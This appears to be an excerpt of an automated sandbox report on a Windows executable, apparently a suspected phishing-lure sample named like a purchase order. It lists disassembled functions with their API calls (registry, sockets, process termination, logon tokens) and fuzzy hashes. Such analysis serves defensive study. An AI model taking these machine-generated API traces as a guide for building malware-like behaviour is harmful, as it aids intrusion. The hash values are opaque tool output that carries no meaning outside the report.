                          • Instruction ID: 17f24920587ff413824d789e5c8f5063b042bbbfd8dc8f826e2b483c937c452b
                          • Opcode Fuzzy Hash: 8f03e729264811b8e3ca711bda371e22eaa1877972c72fae9175d01bfea72828
                          • Instruction Fuzzy Hash: A31193B214021D7EFF119F64CC85EE77F5DEF187A8F004111B618A20A0C6769C61ABA4
                          APIs
                            • Part of subcall function 00F3D7A3: _free.LIBCMT ref: 00F3D7CC
                          • _free.LIBCMT ref: 00F3D82D
                            • Part of subcall function 00F329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000), ref: 00F329DE
                            • Part of subcall function 00F329C8: GetLastError.KERNEL32(00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000,00000000), ref: 00F329F0
                          • _free.LIBCMT ref: 00F3D838
                          • _free.LIBCMT ref: 00F3D843
                          • _free.LIBCMT ref: 00F3D897
                          • _free.LIBCMT ref: 00F3D8A2
                          • _free.LIBCMT ref: 00F3D8AD
                          • _free.LIBCMT ref: 00F3D8B8
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                          • Instruction ID: 82b64028526ad951a29b951b70d79b2b22278ccd2c0c3e83ac0e9dd9a55a4ce1
                          • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                          • Instruction Fuzzy Hash: 8C116071941B14BAD621BFF0EC47FCB7BECAF00720F400825B699A6292DA7DB505B760
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F6DA74
                          • LoadStringW.USER32(00000000), ref: 00F6DA7B
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F6DA91
                          • LoadStringW.USER32(00000000), ref: 00F6DA98
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F6DADC
                          Strings
                          • %s (%d) : ==> %s: %s %s, xrefs: 00F6DAB9
                          Similarity
                          • API ID: HandleLoadModuleString$Message
                          • String ID: %s (%d) : ==> %s: %s %s
                          • API String ID: 4072794657-3128320259
                          • Opcode ID: cb95e60017aaeb7814644ec1add739a215ec6cc2078d096febd9926889333e20
                          • Instruction ID: 6c64f52b851789a54b53d98b62d4debec262976fe45d7b4a3f7d5afba0155104
                          • Opcode Fuzzy Hash: cb95e60017aaeb7814644ec1add739a215ec6cc2078d096febd9926889333e20
                          • Instruction Fuzzy Hash: B50162F290420C7FEB10EBE09D89EE7366CE708701F400496B706E2042E6749E845FB5
                          APIs
                          • InterlockedExchange.KERNEL32(0123EBA8,0123EBA8), ref: 00F7097B
                          • EnterCriticalSection.KERNEL32(0123EB88,00000000), ref: 00F7098D
                          • TerminateThread.KERNEL32(00540050,000001F6), ref: 00F7099B
                          • WaitForSingleObject.KERNEL32(00540050,000003E8), ref: 00F709A9
                          • CloseHandle.KERNEL32(00540050), ref: 00F709B8
                          • InterlockedExchange.KERNEL32(0123EBA8,000001F6), ref: 00F709C8
                          • LeaveCriticalSection.KERNEL32(0123EB88), ref: 00F709CF
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: 7a971a79af0f386e310affb30b39ea3d01bc476aa460bffc716856e766b1c932
                          • Instruction ID: 9e7b0993b15e74f1699c31184181317087259852996b5cafe4900e72bab2eb90
                          • Opcode Fuzzy Hash: 7a971a79af0f386e310affb30b39ea3d01bc476aa460bffc716856e766b1c932
                          • Instruction Fuzzy Hash: EDF0CD31842916FBD7515BA4EE89AD67A35BF05712F801027F201508A1CB75A465EFE0
                          APIs
                          • GetClientRect.USER32(?,?), ref: 00F05D30
                          • GetWindowRect.USER32(?,?), ref: 00F05D71
                          • ScreenToClient.USER32(?,?), ref: 00F05D99
                          • GetClientRect.USER32(?,?), ref: 00F05ED7
                          • GetWindowRect.USER32(?,?), ref: 00F05EF8
                          Similarity
                          • API ID: Rect$Client$Window$Screen
                          • String ID:
                          • API String ID: 1296646539-0
                          • Opcode ID: 7762a41ca632abe3f4cd7ad5a37a416f38ac51fde4ae8b766b73e8582cb6bd25
                          • Instruction ID: 0344c20e5a01e0fa6e3d470e7da3d67f8fcf5d7fb7874191b61d435001619d6e
                          • Opcode Fuzzy Hash: 7762a41ca632abe3f4cd7ad5a37a416f38ac51fde4ae8b766b73e8582cb6bd25
                          • Instruction Fuzzy Hash: 98B15B35A0064ADBDB14CFA9C4407EEBBF1FF58310F14841AE8A9E7290DB74AA51EF54
                          APIs
                          • __allrem.LIBCMT ref: 00F300BA
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F300D6
                          • __allrem.LIBCMT ref: 00F300ED
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3010B
                          • __allrem.LIBCMT ref: 00F30122
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F30140
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 1992179935-0
                          • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                          • Instruction ID: b151cec045b01567b1c395b9ed02a3c30887132bdeffbdd3a96d948fbf5259f3
                          • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                          • Instruction Fuzzy Hash: 18812672A007169BE724AF28DC51B6B73F8AF41730F24423AF951DB681EB74D904A790
                          APIs
                            • Part of subcall function 00F83149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00F8101C,00000000,?,?,00000000), ref: 00F83195
                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F81DC0
                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F81DE1
                          • WSAGetLastError.WSOCK32 ref: 00F81DF2
                          • inet_ntoa.WSOCK32(?), ref: 00F81E8C
                          • htons.WSOCK32(?,?,?,?,?), ref: 00F81EDB
                          • _strlen.LIBCMT ref: 00F81F35
                            • Part of subcall function 00F639E8: _strlen.LIBCMT ref: 00F639F2
                            • Part of subcall function 00F06D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00F1CF58,?,?,?), ref: 00F06DBA
                            • Part of subcall function 00F06D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00F1CF58,?,?,?), ref: 00F06DED
                          Similarity
                          • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                          • String ID:
                          • API String ID: 1923757996-0
                          • Opcode ID: 13ec7813eec5e72a5f3966b3b86794c650faee33b0f32bad3e89b22a9167b467
                          • Instruction ID: 63b65442a0c8885538c4f30499a35d85629411ffdd25275de0a494fc60872ccf
                          • Opcode Fuzzy Hash: 13ec7813eec5e72a5f3966b3b86794c650faee33b0f32bad3e89b22a9167b467
                          • Instruction Fuzzy Hash: F0A1BF31604300AFC324EB24CC85FAA77A9BF84318F548A4CF5565B2E2DB75ED46EB91
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F282D9,00F282D9,?,?,?,00F3644F,00000001,00000001,8BE85006), ref: 00F36258
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F3644F,00000001,00000001,8BE85006,?,?,?), ref: 00F362DE
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F363D8
                          • __freea.LIBCMT ref: 00F363E5
                            • Part of subcall function 00F33820: RtlAllocateHeap.NTDLL(00000000,?,00FD1444,?,00F1FDF5,?,?,00F0A976,00000010,00FD1440,00F013FC,?,00F013C6,?,00F01129), ref: 00F33852
                          • __freea.LIBCMT ref: 00F363EE
                          • __freea.LIBCMT ref: 00F36413
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                          • String ID:
                          • API String ID: 1414292761-0
                          • Opcode ID: 9191ad8d30961c8d826758253fab35d3eef3e94f75734ed8dbe10c7003b10299
                          • Instruction ID: ed0466a5fc05b2cc17c90f32f6d1ec4c3ac9465f2fabf7511b620d39d6d35f05
                          • Opcode Fuzzy Hash: 9191ad8d30961c8d826758253fab35d3eef3e94f75734ed8dbe10c7003b10299
                          • Instruction Fuzzy Hash: 43519073A00216BBDF258F64DC81EAF7BA9EB44770F158629FC05D6241DB38DC44E6A0
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F8C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8B6AE,?,?), ref: 00F8C9B5
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8C9F1
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA68
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8BCCA
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8BD25
                          • RegCloseKey.ADVAPI32(00000000), ref: 00F8BD6A
                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F8BD99
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F8BDF3
                          • RegCloseKey.ADVAPI32(?), ref: 00F8BDFF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                          • String ID:
                          • API String ID: 1120388591-0
                          • Opcode ID: 86ea7b2369e48a270b042fed92558088f0cc0130130f83ba2a80411553092c6a
                          • Instruction ID: 71b144ae6473d3a7d2c02cdd07dba18d1463b296b119aad0c15b164537ca35a5
                          • Opcode Fuzzy Hash: 86ea7b2369e48a270b042fed92558088f0cc0130130f83ba2a80411553092c6a
                          • Instruction Fuzzy Hash: E281DE31608241EFD714EF24C885E6ABBE5FF84318F14895CF4598B2A2DB31ED45EB92
                          APIs
                          • VariantInit.OLEAUT32(00000035), ref: 00F5F7B9
                          • SysAllocString.OLEAUT32(00000001), ref: 00F5F860
                          • VariantCopy.OLEAUT32(00F5FA64,00000000), ref: 00F5F889
                          • VariantClear.OLEAUT32(00F5FA64), ref: 00F5F8AD
                          • VariantCopy.OLEAUT32(00F5FA64,00000000), ref: 00F5F8B1
                          • VariantClear.OLEAUT32(?), ref: 00F5F8BB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Variant$ClearCopy$AllocInitString
                          • String ID:
                          • API String ID: 3859894641-0
                          • Opcode ID: e938f231fdaf5c794084daa6e0d0aa5b15ab044709c7b396464497a4dddec882
                          • Instruction ID: f8ec5b82bd70f80412e36d4f05ca04fde0fa31eac938f99e2edb337e2be54615
                          • Opcode Fuzzy Hash: e938f231fdaf5c794084daa6e0d0aa5b15ab044709c7b396464497a4dddec882
                          • Instruction Fuzzy Hash: FA51E831A00310BACF10AB65DC95B29B3A8EF45312F2484A7EE05DF295DB748C8CF796
                          APIs
                            • Part of subcall function 00F07620: _wcslen.LIBCMT ref: 00F07625
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00F794E5
                          • _wcslen.LIBCMT ref: 00F79506
                          • _wcslen.LIBCMT ref: 00F7952D
                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00F79585
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$FileName$OpenSave
                          • String ID: X
                          • API String ID: 83654149-3081909835
                          • Opcode ID: 71685ecfda6b8935b5f7388c710d00e6c5a892bfb7b5319b706faaf7fc296f0f
                          • Instruction ID: 62ea15dcca3e43e0bf742bc080293a70b22795642df251bdb6a38e3c182f5424
                          • Opcode Fuzzy Hash: 71685ecfda6b8935b5f7388c710d00e6c5a892bfb7b5319b706faaf7fc296f0f
                          • Instruction Fuzzy Hash: 96E1B4319083508FD724EF24C881A6AB7E4BF85314F04C56DF8899B3A2DB75ED45EB92
                          APIs
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          • BeginPaint.USER32(?,?,?), ref: 00F19241
                          • GetWindowRect.USER32(?,?), ref: 00F192A5
                          • ScreenToClient.USER32(?,?), ref: 00F192C2
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F192D3
                          • EndPaint.USER32(?,?,?,?,?), ref: 00F19321
                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F571EA
                            • Part of subcall function 00F19339: BeginPath.GDI32(00000000), ref: 00F19357
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                          • String ID:
                          • API String ID: 3050599898-0
                          • Opcode ID: e2c44125c2cc4ce312ee423b472fe0b9ac82087651a380361e2b4ab7ea023ddb
                          • Instruction ID: dd1d9b495a63e3ce017e7e534d8941be135a02d9f3d0bf8d54db440e9bcf91e7
                          • Opcode Fuzzy Hash: e2c44125c2cc4ce312ee423b472fe0b9ac82087651a380361e2b4ab7ea023ddb
                          • Instruction Fuzzy Hash: C841A131509304AFD710DF64DCA4FAA7BA9FB45361F14022AFA64871A1C7719885FBA2
                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F7080C
                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00F70847
                          • EnterCriticalSection.KERNEL32(?), ref: 00F70863
                          • LeaveCriticalSection.KERNEL32(?), ref: 00F708DC
                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00F708F3
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F70921
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                          • String ID:
                          • API String ID: 3368777196-0
                          • Opcode ID: b8a0027f0a8dae2f54877ac210cb6b7cfdfd48b7239cea6d977255287f3b2219
                          • Instruction ID: 3698f45ba4975b1bd26bf836e6ed343c42806a435e6b795917837b037a4af6e9
                          • Opcode Fuzzy Hash: b8a0027f0a8dae2f54877ac210cb6b7cfdfd48b7239cea6d977255287f3b2219
                          • Instruction Fuzzy Hash: 24416B71A00209EFDF149F54DC85AAA77B8FF04310F1480A6ED049B297DB34DE65EBA5
                          APIs
                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00F5F3AB,00000000,?,?,00000000,?,00F5682C,00000004,00000000,00000000), ref: 00F9824C
                          • EnableWindow.USER32(00000000,00000000), ref: 00F98272
                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00F982D1
                          • ShowWindow.USER32(00000000,00000004), ref: 00F982E5
                          • EnableWindow.USER32(00000000,00000001), ref: 00F9830B
                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00F9832F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          • API String ID: 642888154-0
                          • Opcode ID: 525e0a22225de3b03babf9662ad3ba56f08c64fb693cba6b20773f99a6382677
                          • Instruction ID: 028252a8516e124dab15df553b91f3e4ecb6d388dea65aa09ada3c15afc493a0
                          • Opcode Fuzzy Hash: 525e0a22225de3b03babf9662ad3ba56f08c64fb693cba6b20773f99a6382677
                          • Instruction Fuzzy Hash: 55416634A01644AFEF25CF25DC95FE47BE1BB47764F184169E5084B262CB31A842EF51
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00F64C95
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F64CB2
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F64CEA
                          • _wcslen.LIBCMT ref: 00F64D08
                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F64D10
                          • _wcsstr.LIBVCRUNTIME ref: 00F64D1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                          • String ID:
                          • API String ID: 72514467-0
                          • Opcode ID: 39e2abb39cdb1bffb1b6c6d09290f5aa3af99773e77a3ee1f55c652e29ce30f8
                          • Instruction ID: aab751dff93ff4273e46680d0e4e19439223f8420899a413e157028d49457b7b
                          • Opcode Fuzzy Hash: 39e2abb39cdb1bffb1b6c6d09290f5aa3af99773e77a3ee1f55c652e29ce30f8
                          • Instruction Fuzzy Hash: 0221DB72A04214BBEB156B35EC49E7F7BACDF45760F10403AF909CA191DA65EC41B7A0
                          APIs
                            • Part of subcall function 00F03AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F03A97,?,?,00F02E7F,?,?,?,00000000), ref: 00F03AC2
                          • _wcslen.LIBCMT ref: 00F7587B
                          • CoInitialize.OLE32(00000000), ref: 00F75995
                          • CoCreateInstance.OLE32(00F9FCF8,00000000,00000001,00F9FB68,?), ref: 00F759AE
                          • CoUninitialize.OLE32 ref: 00F759CC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                          • String ID: .lnk
                          • API String ID: 3172280962-24824748
                          • Opcode ID: 74672d48d4285035f2313065be34fb8098a5d95187171bcc5c9e0fe5d58cb216
                          • Instruction ID: 7aae81c6e7be86356fc6082dda70d581b03922d1a8dfa89a014a0b27063e5c59
                          • Opcode Fuzzy Hash: 74672d48d4285035f2313065be34fb8098a5d95187171bcc5c9e0fe5d58cb216
                          • Instruction Fuzzy Hash: F5D15671A047019FC714DF14C880A2AB7F5EF89B24F14885EF8899B3A1D775EC45EB92
                          APIs
                            • Part of subcall function 00F60FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F60FCA
                            • Part of subcall function 00F60FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F60FD6
                            • Part of subcall function 00F60FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F60FE5
                            • Part of subcall function 00F60FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F60FEC
                            • Part of subcall function 00F60FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F61002
                          • GetLengthSid.ADVAPI32(?,00000000,00F61335), ref: 00F617AE
                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F617BA
                          • HeapAlloc.KERNEL32(00000000), ref: 00F617C1
                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F617DA
                          • GetProcessHeap.KERNEL32(00000000,00000000,00F61335), ref: 00F617EE
                          • HeapFree.KERNEL32(00000000), ref: 00F617F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                          • String ID:
                          • API String ID: 3008561057-0
                          • Opcode ID: 0b2d62dc8544b4cd43b63fc46d78f671a8a0a70483af470e8daa9448fa31dee1
                          • Instruction ID: 593e11715351cb9d1a3c09ab219eae649592c8e2d7d5aeb5fcf9c05a5a94b59a
                          • Opcode Fuzzy Hash: 0b2d62dc8544b4cd43b63fc46d78f671a8a0a70483af470e8daa9448fa31dee1
                          • Instruction Fuzzy Hash: 1211BE32900209FFDB109FA4CC49BAF7BA9FB42365F184019F44197211D73AAA40EBA0
                          APIs
                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F614FF
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00F61506
                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F61515
                          • CloseHandle.KERNEL32(00000004), ref: 00F61520
                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F6154F
                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F61563
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                          • String ID:
                          • API String ID: 1413079979-0
                          • Opcode ID: 3e677426a0c9fd2cb688d2a8419ad46f891956f57e1ec71c95dee91e58f00eec
                          • Instruction ID: 58690c52cb185fe32cab1f3971c67035557b69abc978c113dd47db871dd6a92b
                          • Opcode Fuzzy Hash: 3e677426a0c9fd2cb688d2a8419ad46f891956f57e1ec71c95dee91e58f00eec
                          • Instruction Fuzzy Hash: 5D11297290120DABDF11CFA8EE49FDE7BA9FF49754F084015FA05A2060C3758E60EBA1
                          APIs
                          • GetLastError.KERNEL32(?,?,00F23379,00F22FE5), ref: 00F23390
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F2339E
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F233B7
                          • SetLastError.KERNEL32(00000000,?,00F23379,00F22FE5), ref: 00F23409
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: cd9e88b5bd1b96eb3965d9bab541e12fd12e5f3fe516cbfd9fa93e4f97130f3b
                          • Instruction ID: 34f8c1ccaf4405d8dc71738a4f07b88285b175ea7bf9e1c6d727f0fe562a0282
                          • Opcode Fuzzy Hash: cd9e88b5bd1b96eb3965d9bab541e12fd12e5f3fe516cbfd9fa93e4f97130f3b
                          • Instruction Fuzzy Hash: B30147B3A09335BEAA2477747C86E273E98EB05779720022AF414C21F0EF1D4E037184
                          APIs
                          • GetLastError.KERNEL32(?,?,00F35686,00F43CD6,?,00000000,?,00F35B6A,?,?,?,?,?,00F2E6D1,?,00FC8A48), ref: 00F32D78
                          • _free.LIBCMT ref: 00F32DAB
                          • _free.LIBCMT ref: 00F32DD3
                          • SetLastError.KERNEL32(00000000,?,?,?,?,00F2E6D1,?,00FC8A48,00000010,00F04F4A,?,?,00000000,00F43CD6), ref: 00F32DE0
                          • SetLastError.KERNEL32(00000000,?,?,?,?,00F2E6D1,?,00FC8A48,00000010,00F04F4A,?,?,00000000,00F43CD6), ref: 00F32DEC
                          • _abort.LIBCMT ref: 00F32DF2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          • Opcode ID: ddc9ddcf52ebdbbec95958ec2209e6a4ca1f3d1d3bd563c446c88b9d0baeef34
                          • Instruction ID: 13deaba4b4433e1ef2d33d94a0724f440afdfdea2c8e7825518799e16881cb13
                          • Opcode Fuzzy Hash: ddc9ddcf52ebdbbec95958ec2209e6a4ca1f3d1d3bd563c446c88b9d0baeef34
                          • Instruction Fuzzy Hash: 3CF0FC329056106BC6927739BC06F1F3569AFC17B1F240419F828D32D2EF38D80271B0
                          APIs
                            • Part of subcall function 00F19639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F19693
                            • Part of subcall function 00F19639: SelectObject.GDI32(?,00000000), ref: 00F196A2
                            • Part of subcall function 00F19639: BeginPath.GDI32(?), ref: 00F196B9
                            • Part of subcall function 00F19639: SelectObject.GDI32(?,00000000), ref: 00F196E2
                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00F98A4E
                          • LineTo.GDI32(?,00000003,00000000), ref: 00F98A62
                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00F98A70
                          • LineTo.GDI32(?,00000000,00000003), ref: 00F98A80
                          • EndPath.GDI32(?), ref: 00F98A90
                          • StrokePath.GDI32(?), ref: 00F98AA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                          • String ID:
                          • API String ID: 43455801-0
                          • Opcode ID: 0afceb62a933c2c81c1465c9bbc06f0d012e4854b080fe0c8d9fb525df10df85
                          • Instruction ID: c401fef394a0edd21a11b967a960f1310d3e00c5c44fc80609cbfae903e46bfc
                          • Opcode Fuzzy Hash: 0afceb62a933c2c81c1465c9bbc06f0d012e4854b080fe0c8d9fb525df10df85
                          • Instruction Fuzzy Hash: F211C97644014DFFEF129F94DC88EAA7F6DEB08394F048012FA199A1B1C7719D55EBA0
                          APIs
                          • GetDC.USER32(00000000), ref: 00F65218
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F65229
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F65230
                          • ReleaseDC.USER32(00000000,00000000), ref: 00F65238
                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F6524F
                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00F65261
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CapsDevice$Release
                          • String ID:
                          • API String ID: 1035833867-0
                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F01BF4
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F01BFC
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F01C07
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F01C12
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F01C1A
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F01C22
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F6EB30
                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F6EB46
                          • GetWindowThreadProcessId.USER32(?,?), ref: 00F6EB55
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6EB64
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6EB6E
                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6EB75
